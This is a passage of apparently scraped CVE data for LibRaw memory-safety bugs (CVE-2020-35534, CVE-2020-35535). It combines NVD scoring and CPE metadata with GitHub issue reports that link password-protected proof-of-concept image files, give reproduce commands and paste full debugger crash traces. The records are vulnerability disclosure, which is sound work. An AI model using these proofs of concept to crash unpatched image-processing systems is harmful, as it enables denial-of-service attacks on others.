[e:\workspace\imagemagick\imagemagick-7.0.10-7\imagemagick\magickcore\constitute.c @ 553] *** WARNING: Unable to verify checksum for E:\Workspace\imageMagick\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_MagickWand_.dll 06 0000003f 23bea6e0 00007ffe 7ff4aac3 CORE_DB_MagickCore_!ReadImages+0x393 [e:\workspace\imagemagick\imagemagick-7.0.10-7\imagemagick\magickcore\constitute.c @ 941] 07 0000003f 23beb790 00007ffe 7ffe4758 CORE_DB_MagickWand_!ConvertImageCommand+0x1523 [e:\workspace\imagemagick\imagemagick-7.0.10-7\imagemagick\magickwand\convert.c @ 606] *** WARNING: Unable to verify checksum for magick.exe 08 0000003f 23bed2e0 00007ff7 d89d14ea CORE_DB_MagickWand_!MagickCommandGenesis+0x338 [e:\workspace\imagemagick\imagemagick-7.0.10-7\imagemagick\magickwand\mogrify.c @ 186] 09 0000003f 23bee450 00007ff7 d89d1693 magick!MagickMain+0x4ea [e:\workspace\imagemagick\imagemagick-7.0.10-7\imagemagick\utilities\magick.c @ 149] 0a 0000003f 23bef6c0 00007ff7 d89d1f24 magick!wmain+0x43 [e:\workspace\imagemagick\imagemagick-7.0.10-7\imagemagick\utilities\magick.c @ 195] 0b 0000003f 23bef700 00007ff7 d89d1e37 magick!invoke_main+0x34 [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 80] 0c 0000003f 23bef740 00007ff7 d89d1cfe magick!__scrt_common_main_seh+0x127 [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 253] 0d 0000003f 23bef7a0 00007ff7 d89d1f39 magick!__scrt_common_main+0xe [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 296] 0e 0000003f 23bef7d0 00007ffe bf9b7bd4 magick!wmainCRTStartup+0x9 [f:\dd\vctools\crt\vcstartup\src\startup\exe_wmain.cpp @ 17] 0f 0000003f 23bef800 00007ffe c156ced1 KERNEL32!BaseThreadInitThunk+0x14 10 0000003f 23bef830 00000000 00000000 ntdll!RtlUserThreadStart+0x21 **System Configuration** - ImageMagick: Version: ImageMagick-7.0.10-Q16 https://imagemagick.org License: https://imagemagick.org/script/license.php - Environment (Operating system, version and so on): Distributor ID: Microsoft Windows Description: Windows 10
"LibRaw::adobe_copy_pixel()" Out-of-bounds read vulnerability
https://api.github.com/repos/LibRaw/LibRaw/issues/273/comments
2
2020-04-08T15:45:46Z
2020-06-15T15:00:04Z
https://github.com/LibRaw/LibRaw/issues/273
596,678,080
273
4,078
CVE-2020-35534
2022-09-01T18:15:08.970
In LibRaw, there is a memory corruption vulnerability within the "crxFreeSubbandData()" function (libraw\src\decoders\crx.cpp) when processing cr3 files.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/commit/e41f331e90b383e3208cefb74e006df44bf3a4b8" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/issues/279" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/commit/e41f331e90b383e3208cefb74e006df44bf3a4b8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/issues/279" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libraw:libraw:0.20.0:-:*:*:*:*:*:*", "matchCriteriaId": "E00F0C8F-11AC-42B2-8D85-27028B41EBF3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.20.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "B4B8669B-CE7F-47D2-9111-E7787EAD6E7E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.20.1:*:*:*:*:*:*:*", "matchCriteriaId": "8269B02E-558F-4AA5-9EEA-87226A3D1816", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.20.2:*:*:*:*:*:*:*", "matchCriteriaId": "06DBABB8-8921-4E8B-B9E5-FFE6CCE79EB9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.21.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "36C296E2-1899-457B-9EB2-916A33E383C2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/LibRaw/LibRaw/issues/279
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibRaw", "LibRaw" ]
**Description:** There is a memory corruption vulnerability within the "crxFreeSubbandData()" function (libraw\src\decoders\crx.cpp) when processing cr3 files. **Steps to Reproduce:** poc (password: 0xfoxone): https://drive.google.com/open?id=10pjqVx6mItzmvovgqF-8IHi3jnnKQ6fD cmd: magick.exe convert poc.cr3 new.bmp Upon running this, following crash happens (Note: I enabled page heap on magick.exe): Microsoft (R) Windows Debugger Version 10.0.18362.1 X86 Copyright (c) Microsoft Corporation. All rights reserved. CommandLine: C:\ImageMagick-7.0.10-7-x86\VisualMagick\bin\magick.exe convert c:\poc.cr3 c:\new.bmp Symbol search path is: srv* Executable search path is: ModLoad: 00e90000 00ea0000 magick.exe ModLoad: 776c0000 7785a000 ntdll.dll Page heap: pid 0x125C: page heap enabled with flags 0x3. ModLoad: 6c050000 6c0b3000 C:\WINDOWS\SysWOW64\verifier.dll Page heap: pid 0x125C: page heap enabled with flags 0x3. ModLoad: 75260000 75340000 C:\WINDOWS\SysWOW64\KERNEL32.DLL ModLoad: 76570000 7676e000 C:\WINDOWS\SysWOW64\KERNELBASE.dll ModLoad: 6bdf0000 6c049000 C:\ImageMagick-7.0.10-7-x86\VisualMagick\bin\CORE_DB_MagickCore_.dll ModLoad: 75530000 756c7000 C:\WINDOWS\SysWOW64\USER32.dll ModLoad: 756d0000 756e7000 C:\WINDOWS\SysWOW64\win32u.dll ModLoad: 76470000 76491000 C:\WINDOWS\SysWOW64\GDI32.dll ModLoad: 75340000 7549a000 C:\WINDOWS\SysWOW64\gdi32full.dll ModLoad: 75dd0000 75e4c000 C:\WINDOWS\SysWOW64\msvcp_win.dll ModLoad: 76ab0000 76bcf000 C:\WINDOWS\SysWOW64\ucrtbase.dll ModLoad: 754b0000 75529000 C:\WINDOWS\SysWOW64\ADVAPI32.dll ModLoad: 775f0000 776af000 C:\WINDOWS\SysWOW64\msvcrt.dll ModLoad: 76a30000 76aa6000 C:\WINDOWS\SysWOW64\sechost.dll ModLoad: 75720000 757db000 C:\WINDOWS\SysWOW64\RPCRT4.dll ModLoad: 74e90000 74eb0000 C:\WINDOWS\SysWOW64\SspiCli.dll ModLoad: 74e80000 74e8a000 C:\WINDOWS\SysWOW64\CRYPTBASE.dll ModLoad: 750f0000 7514f000 C:\WINDOWS\SysWOW64\bcryptPrimitives.dll ModLoad: 76510000 7656e000 C:\WINDOWS\SysWOW64\WS2_32.dll ModLoad: 6bc80000 6bde2000 C:\ImageMagick-7.0.10-7-x86\VisualMagick\bin\CORE_DB_MagickWand_.dll ModLoad: 6bc60000 6bc7c000 C:\WINDOWS\SysWOW64\VCRUNTIME140D.dll ModLoad: 6bae0000 6bc53000 C:\WINDOWS\SysWOW64\ucrtbased.dll ModLoad: 6bac0000 6bade000 C:\ImageMagick-7.0.10-7-x86\VisualMagick\bin\CORE_DB_bzlib_.dll ModLoad: 6b9f0000 6bac0000 C:\ImageMagick-7.0.10-7-x86\VisualMagick\bin\CORE_DB_freetype_.dll ModLoad: 6b980000 6b9e6000 C:\ImageMagick-7.0.10-7-x86\VisualMagick\bin\CORE_DB_lcms_.dll ModLoad: 6b900000 6b97c000 C:\ImageMagick-7.0.10-7-x86\VisualMagick\bin\CORE_DB_libxml_.dll ModLoad: 6b8e0000 6b8fa000 C:\ImageMagick-7.0.10-7-x86\VisualMagick\bin\CORE_DB_lqr_.dll ModLoad: 6b8b0000 6b8d1000 C:\ImageMagick-7.0.10-7-x86\VisualMagick\bin\CORE_DB_zlib_.dll ModLoad: 6b880000 6b8a8000 C:\WINDOWS\SysWOW64\VCOMP140D.DLL ModLoad: 6b5f0000 6b87e000 C:\ImageMagick-7.0.10-7-x86\VisualMagick\bin\CORE_DB_glib_.dll ModLoad: 76cd0000 77246000 C:\WINDOWS\SysWOW64\SHELL32.dll ModLoad: 769f0000 76a2b000 C:\WINDOWS\SysWOW64\cfgmgr32.dll ModLoad: 75d40000 75dc4000 C:\WINDOWS\SysWOW64\shcore.dll ModLoad: 77370000 775e5000 C:\WINDOWS\SysWOW64\combase.dll ModLoad: 75ea0000 76464000 C:\WINDOWS\SysWOW64\windows.storage.dll ModLoad: 75d20000 75d3b000 C:\WINDOWS\SysWOW64\profapi.dll ModLoad: 75cd0000 75d13000 C:\WINDOWS\SysWOW64\powrprof.dll ModLoad: 76770000 7677d000 C:\WINDOWS\SysWOW64\UMPDC.dll ModLoad: 764c0000 76504000 C:\WINDOWS\SysWOW64\shlwapi.dll ModLoad: 756f0000 756ff000 C:\WINDOWS\SysWOW64\kernel.appcore.dll ModLoad: 76780000 76793000 C:\WINDOWS\SysWOW64\cryptsp.dll ModLoad: 76bd0000 76cc7000 C:\WINDOWS\SysWOW64\ole32.dll ModLoad: 747c0000 747f2000 C:\WINDOWS\SysWOW64\IPHLPAPI.DLL ModLoad: 74720000 747b3000 C:\WINDOWS\SysWOW64\DNSAPI.dll ModLoad: 75700000 75707000 C:\WINDOWS\SysWOW64\NSI.dll (125c.fa8): Break instruction exception - code 80000003 (first chance) eax=00000000 ebx=011be000 ecx=366a0000 edx=00000000 esi=04b1a7c8 edi=776c688c eip=7776eaa2 esp=00f9f7d0 ebp=00f9f7fc iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 ntdll!LdrInitShimEngineDynamic+0x6e2: 7776eaa2 cc int 3 0:000> g ModLoad: 77340000 77365000 C:\WINDOWS\SysWOW64\IMM32.DLL ModLoad: 6b390000 6b39e000 C:\ImageMagick-7.0.10-7-x86\VisualMagick\bin\IM_MOD_DB_DNG_.dll ModLoad: 6b230000 6b384000 C:\ImageMagick-7.0.10-7-x86\VisualMagick\bin\CORE_DB_libraw_.dll ModLoad: 6b170000 6b229000 C:\WINDOWS\SysWOW64\MSVCP140D.dll ModLoad: 73db0000 73ddf000 C:\WINDOWS\SysWOW64\rsaenh.dll ModLoad: 764a0000 764b9000 C:\WINDOWS\SysWOW64\bcrypt.dll (125c.fa8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for C:\ImageMagick-7.0.10-7-x86\VisualMagick\bin\CORE_DB_libraw_.dll eax=cdcdcdcd ebx=00000000 ecx=cdcdcdcd edx=0a2465b8 esi=00f9414c edi=00f941a4 eip=6b2e0e5f esp=00f94114 ebp=00f9411c iopl=0 nv up ei ng nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010282 CORE_DB_libraw_!crxFreeSubbandData+0xf: 6b2e0e5f 833800 cmp dword ptr [eax],0 ds:002b:cdcdcdcd=???????? 0:000> k ChildEBP RetAddr 00 00f9411c 6b2e0de7 CORE_DB_libraw_!crxFreeSubbandData+0xf [c:\imagemagick-7.0.10-7-x86\libraw\src\decoders\crx.cpp @ 1633] 01 00f94140 6b2e3100 CORE_DB_libraw_!crxFreeImageData+0xa7 [c:\imagemagick-7.0.10-7-x86\libraw\src\decoders\crx.cpp @ 2341] 02 00f941f8 6b2f86f5 CORE_DB_libraw_!LibRaw::crxLoadRaw+0x210 [c:\imagemagick-7.0.10-7-x86\libraw\src\decoders\crx.cpp @ 2440] 03 00f94374 6b300abc CORE_DB_libraw_!LibRaw::unpack+0xa25 [c:\imagemagick-7.0.10-7-x86\libraw\src\decoders\unpack.cpp @ 282] *** WARNING: Unable to verify checksum for C:\ImageMagick-7.0.10-7-x86\VisualMagick\bin\IM_MOD_DB_DNG_.dll 04 00f94380 6b391be6 CORE_DB_libraw_!libraw_unpack+0x2c [c:\imagemagick-7.0.10-7-x86\libraw\src\libraw_c_api.cpp @ 136] *** WARNING: Unable to verify checksum for C:\ImageMagick-7.0.10-7-x86\VisualMagick\bin\CORE_DB_MagickCore_.dll 05 00f963d8 6be552e3 IM_MOD_DB_DNG_!ReadDNGImage+0x466 [c:\imagemagick-7.0.10-7-x86\imagemagick\coders\dng.c @ 408] 06 00f9b4f0 6be568ac CORE_DB_MagickCore_!ReadImage+0x543 [c:\imagemagick-7.0.10-7-x86\imagemagick\magickcore\constitute.c @ 553] *** WARNING: Unable to verify checksum for C:\ImageMagick-7.0.10-7-x86\VisualMagick\bin\CORE_DB_MagickWand_.dll 07 00f9c534 6bcad449 CORE_DB_MagickCore_!ReadImages+0x2fc [c:\imagemagick-7.0.10-7-x86\imagemagick\magickcore\constitute.c @ 941] 08 00f9da94 6bd1912d CORE_DB_MagickWand_!ConvertImageCommand+0xd29 [c:\imagemagick-7.0.10-7-x86\imagemagick\magickwand\convert.c @ 606] *** WARNING: Unable to verify checksum for magick.exe 09 00f9eb50 00e913de CORE_DB_MagickWand_!MagickCommandGenesis+0x2cd [c:\imagemagick-7.0.10-7-x86\imagemagick\magickwand\mogrify.c @ 186] 0a 00f9fc84 00e91626 magick!MagickMain+0x3de [c:\imagemagick-7.0.10-7-x86\imagemagick\utilities\magick.c @ 149] 0b 00f9fca4 00e91d2e magick!wmain+0x46 [c:\imagemagick-7.0.10-7-x86\imagemagick\utilities\magick.c @ 195] 0c 00f9fcb8 00e91c10 magick!invoke_main+0x1e [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 79] 0d 00f9fd10 00e91abd magick!__scrt_common_main_seh+0x150 [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 253] 0e 00f9fd18 00e91d48 magick!__scrt_common_main+0xd [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 296] 0f 00f9fd20 75276359 magick!wmainCRTStartup+0x8 [f:\dd\vctools\crt\vcstartup\src\startup\exe_wmain.cpp @ 17] WARNING: Stack unwind information not available. Following frames may be wrong. 10 00f9fd30 77727c24 KERNEL32!BaseThreadInitThunk+0x19 11 00f9fd8c 77727bf4 ntdll!RtlGetAppContainerNamedObjectPath+0xe4 12 00f9fd9c 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0xb4 **System Configuration:** - ImageMagick: Version: ImageMagick-7.0.10-Q16 https://imagemagick.org License: https://imagemagick.org/script/license.php - Environment (Operating system, version and so on): Distributor ID: Microsoft Windows Description: Windows 10
Libraw "crxFreeSubbandData()" Memory Corruption Vulnerability
https://api.github.com/repos/LibRaw/LibRaw/issues/279/comments
1
2020-04-26T13:13:45Z
2020-04-26T15:50:32Z
https://github.com/LibRaw/LibRaw/issues/279
607,009,739
279
4,079
CVE-2020-35535
2022-09-01T18:15:09.027
In LibRaw, there is an out-of-bounds read vulnerability within the "LibRaw::parseSonySRF()" function (libraw\src\metadata\sony.cpp) when processing srf files.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/commit/c243f4539233053466c1309bde606815351bee81" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/issues/283" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/commit/c243f4539233053466c1309bde606815351bee81" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/issues/283" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libraw:libraw:0.20.0:-:*:*:*:*:*:*", "matchCriteriaId": "E00F0C8F-11AC-42B2-8D85-27028B41EBF3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.20.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "B4B8669B-CE7F-47D2-9111-E7787EAD6E7E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.20.1:*:*:*:*:*:*:*", "matchCriteriaId": "8269B02E-558F-4AA5-9EEA-87226A3D1816", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.20.2:*:*:*:*:*:*:*", "matchCriteriaId": "06DBABB8-8921-4E8B-B9E5-FFE6CCE79EB9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.21.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "36C296E2-1899-457B-9EB2-916A33E383C2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/LibRaw/LibRaw/issues/283
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibRaw", "LibRaw" ]
**Description:** There is an out-of-bounds read vulnerability within the "LibRaw::parseSonySRF()" function (libraw\src\metadata\sony.cpp) when processing srf files. **Steps to Reproduce:** poc (password: 0xfoxone): https://drive.google.com/open?id=1r0wig5pSGUFhP3mDycIUcKMvnHamYaGJ cmd: magick.exe convert poc.srf new.bmp Upon running this, following crash happens (Note: I enabled page heap on magick.exe): Microsoft (R) Windows Debugger Version 10.0.18362.1 AMD64 Copyright (c) Microsoft Corporation. All rights reserved. CommandLine: C:\ImageMagick-7.0.10-7\VisualMagick\bin\magick.exe convert c:\poc.srf c:\new.bmp Symbol search path is: srv* Executable search path is: ModLoad: 00007ff7`79300000 00007ff7`79312000 magick.exe ModLoad: 00007ffd`b0d20000 00007ffd`b0f10000 ntdll.dll ModLoad: 00007ffd`99d60000 00007ffd`99dd1000 C:\WINDOWS\System32\verifier.dll Page heap: pid 0x1ED0: page heap enabled with flags 0x3. ModLoad: 00007ffd`af870000 00007ffd`af922000 C:\WINDOWS\System32\KERNEL32.DLL ModLoad: 00007ffd`add60000 00007ffd`ae004000 C:\WINDOWS\System32\KERNELBASE.dll ModLoad: 00007ffd`87cf0000 00007ffd`87fe1000 C:\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_MagickCore_.dll ModLoad: 00007ffd`886a0000 00007ffd`8886b000 C:\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_MagickWand_.dll ModLoad: 00007ffd`b01a0000 00007ffd`b0334000 C:\WINDOWS\System32\USER32.dll ModLoad: 00007ffd`aea40000 00007ffd`aea61000 C:\WINDOWS\System32\win32u.dll ModLoad: 00007ffd`af270000 00007ffd`af296000 C:\WINDOWS\System32\GDI32.dll ModLoad: 00007ffd`ae010000 00007ffd`ae1a4000 C:\WINDOWS\System32\gdi32full.dll ModLoad: 00007ffd`aea70000 00007ffd`aeb0e000 C:\WINDOWS\System32\msvcp_win.dll ModLoad: 00007ffd`aeb30000 00007ffd`aec2a000 C:\WINDOWS\System32\ucrtbase.dll ModLoad: 00007ffd`b04c0000 00007ffd`b0563000 C:\WINDOWS\System32\ADVAPI32.dll ModLoad: 00007ffd`afdf0000 00007ffd`afe8e000 C:\WINDOWS\System32\msvcrt.dll ModLoad: 00007ffd`b0420000 00007ffd`b04b7000 C:\WINDOWS\System32\sechost.dll ModLoad: 00007ffd`af5b0000 00007ffd`af6d0000 C:\WINDOWS\System32\RPCRT4.dll ModLoad: 00007ffd`afd80000 00007ffd`afdef000 C:\WINDOWS\System32\WS2_32.dll ModLoad: 00007ffd`a1d20000 00007ffd`a1d42000 C:\WINDOWS\SYSTEM32\VCRUNTIME140D.dll ModLoad: 00007ffd`86800000 00007ffd`869bb000 C:\WINDOWS\SYSTEM32\ucrtbased.dll ModLoad: 00007ffd`8d900000 00007ffd`8da1f000 C:\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_freetype_.dll ModLoad: 00007ffd`8e600000 00007ffd`8e686000 C:\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_lcms_.dll ModLoad: 00007ffd`a1b50000 00007ffd`a1b77000 C:\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_bzlib_.dll ModLoad: 00007ffd`8e1c0000 00007ffd`8e260000 C:\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_libxml_.dll ModLoad: 00007ffd`9dbe0000 00007ffd`9dc03000 C:\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_lqr_.dll ModLoad: 00007ffd`9d610000 00007ffd`9d63a000 C:\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_zlib_.dll ModLoad: 00007ffd`9a400000 00007ffd`9a435000 C:\WINDOWS\SYSTEM32\VCOMP140D.DLL ModLoad: 00007ffd`85150000 00007ffd`8548b000 C:\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_glib_.dll ModLoad: 00007ffd`b05f0000 00007ffd`b0cd4000 C:\WINDOWS\System32\SHELL32.dll ModLoad: 00007ffd`aed80000 00007ffd`aedca000 C:\WINDOWS\System32\cfgmgr32.dll ModLoad: 00007ffd`afc70000 00007ffd`afd19000 C:\WINDOWS\System32\shcore.dll ModLoad: 00007ffd`af930000 00007ffd`afc66000 C:\WINDOWS\System32\combase.dll ModLoad: 00007ffd`ae1b0000 00007ffd`ae230000 C:\WINDOWS\System32\bcryptPrimitives.dll ModLoad: 00007ffd`ae260000 00007ffd`ae9dd000 C:\WINDOWS\System32\windows.storage.dll ModLoad: 00007ffd`adc80000 00007ffd`adca3000 C:\WINDOWS\System32\profapi.dll ModLoad: 00007ffd`adbf0000 00007ffd`adc3a000 C:\WINDOWS\System32\powrprof.dll ModLoad: 00007ffd`adbe0000 00007ffd`adbf0000 C:\WINDOWS\System32\UMPDC.dll ModLoad: 00007ffd`b03c0000 00007ffd`b0412000 C:\WINDOWS\System32\shlwapi.dll ModLoad: 00007ffd`adc40000 00007ffd`adc51000 C:\WINDOWS\System32\kernel.appcore.dll ModLoad: 00007ffd`aeb10000 00007ffd`aeb27000 C:\WINDOWS\System32\cryptsp.dll ModLoad: 00007ffd`b0040000 00007ffd`b0197000 C:\WINDOWS\System32\ole32.dll ModLoad: 00007ffd`ad1b0000 00007ffd`ad27b000 C:\WINDOWS\SYSTEM32\DNSAPI.dll ModLoad: 00007ffd`af370000 00007ffd`af378000 C:\WINDOWS\System32\NSI.dll ModLoad: 00007ffd`ad160000 00007ffd`ad19a000 C:\WINDOWS\SYSTEM32\IPHLPAPI.DLL (1ed0.1214): Break instruction exception - code 80000003 (first chance) ntdll!LdrpDoDebuggerBreak+0x30: 00007ffd`b0df119c cc int 3 0:000> g ModLoad: 00007ffd`af4b0000 00007ffd`af4de000 C:\WINDOWS\System32\IMM32.DLL ModLoad: 00007ffd`a93a0000 00007ffd`a93af000 C:\ImageMagick-7.0.10-7\VisualMagick\bin\IM_MOD_DB_DNG_.dll ModLoad: 00007ffd`86310000 00007ffd`864bc000 C:\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_libraw_.dll ModLoad: 00007ffd`88e10000 00007ffd`88f06000 C:\WINDOWS\SYSTEM32\MSVCP140D.dll (1ed0.1214): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for C:\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_libraw_.dll CORE_DB_libraw_!LibRaw::sget2+0x2c: 00007ffd`86396d9c 0fb60401 movzx eax,byte ptr [rcx+rax] ds:0000019e`5bb50000=?? 0:000> k Child-SP RetAddr Call Site 00 00000093`9ecee890 00007ffd`8636bf5d CORE_DB_libraw_!LibRaw::sget2+0x2c [c:\imagemagick-7.0.10-7\libraw\src\utils\utils_dcraw.cpp @ 84] 01 00000093`9ecee8a0 00007ffd`8636fe7a CORE_DB_libraw_!LibRaw::parseSonySRF+0x42d [c:\imagemagick-7.0.10-7\libraw\src\metadata\sony.cpp @ 1952] 02 00000093`9ecee950 00007ffd`8638071a CORE_DB_libraw_!LibRaw::parse_exif+0x155a [c:\imagemagick-7.0.10-7\libraw\src\metadata\exif_gps.cpp @ 229] 03 00000093`9eceef50 00007ffd`8637bebb CORE_DB_libraw_!LibRaw::parse_tiff_ifd+0x484a [c:\imagemagick-7.0.10-7\libraw\src\metadata\tiff.cpp @ 717] 04 00000093`9ecefdd0 00007ffd`8632f89f CORE_DB_libraw_!LibRaw::parse_tiff+0x11b [c:\imagemagick-7.0.10-7\libraw\src\metadata\tiff.cpp @ 1468] 05 00000093`9ecefe30 00007ffd`864079de CORE_DB_libraw_!LibRaw::identify+0xd2f [c:\imagemagick-7.0.10-7\libraw\src\metadata\identify.cpp @ 537] 06 00000093`9ecf3350 00007ffd`8640b149 CORE_DB_libraw_!LibRaw::open_datastream+0x10e [c:\imagemagick-7.0.10-7\libraw\src\utils\open.cpp @ 377] 07 00000093`9ecf35f0 00007ffd`8641dfc8 CORE_DB_libraw_!LibRaw::open_file+0x269 [c:\imagemagick-7.0.10-7\libraw\src\utils\open.cpp @ 99] *** WARNING: Unable to verify checksum for C:\ImageMagick-7.0.10-7\VisualMagick\bin\IM_MOD_DB_DNG_.dll 08 00000093`9ecf3720 00007ffd`a93a191c CORE_DB_libraw_!libraw_open_wfile+0x58 [c:\imagemagick-7.0.10-7\libraw\src\libraw_c_api.cpp @ 113] *** WARNING: Unable to verify checksum for C:\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_MagickCore_.dll 09 00000093`9ecf3760 00007ffd`87d671e7 IM_MOD_DB_DNG_!ReadDNGImage+0x2fc [c:\imagemagick-7.0.10-7\imagemagick\coders\dng.c @ 379] 0a 00000093`9ecf5870 00007ffd`87d68963 CORE_DB_MagickCore_!ReadImage+0x5e7 [c:\imagemagick-7.0.10-7\imagemagick\magickcore\constitute.c @ 553] *** WARNING: Unable to verify checksum for C:\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_MagickWand_.dll 0b 00000093`9ecfaa90 00007ffd`886daac3 CORE_DB_MagickCore_!ReadImages+0x393 [c:\imagemagick-7.0.10-7\imagemagick\magickcore\constitute.c @ 941] 0c 00000093`9ecfbb40 00007ffd`887744ae CORE_DB_MagickWand_!ConvertImageCommand+0x1523 [c:\imagemagick-7.0.10-7\imagemagick\magickwand\convert.c @ 606] *** WARNING: Unable to verify checksum for magick.exe 0d 00000093`9ecfd690 00007ff7`793014ea CORE_DB_MagickWand_!MagickCommandGenesis+0x33e [c:\imagemagick-7.0.10-7\imagemagick\magickwand\mogrify.c @ 186] 0e 00000093`9ecfe800 00007ff7`79301693 magick!MagickMain+0x4ea [c:\imagemagick-7.0.10-7\imagemagick\utilities\magick.c @ 149] 0f 00000093`9ecffa70 00007ff7`79301f24 magick!wmain+0x43 [c:\imagemagick-7.0.10-7\imagemagick\utilities\magick.c @ 195] 10 00000093`9ecffab0 00007ff7`79301e37 magick!invoke_main+0x34 [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 80] 11 00000093`9ecffaf0 00007ff7`79301cfe magick!__scrt_common_main_seh+0x127 [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 253] 12 00000093`9ecffb50 00007ff7`79301f39 magick!__scrt_common_main+0xe [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 296] 13 00000093`9ecffb80 00007ffd`af887bd4 magick!wmainCRTStartup+0x9 [f:\dd\vctools\crt\vcstartup\src\startup\exe_wmain.cpp @ 17] 14 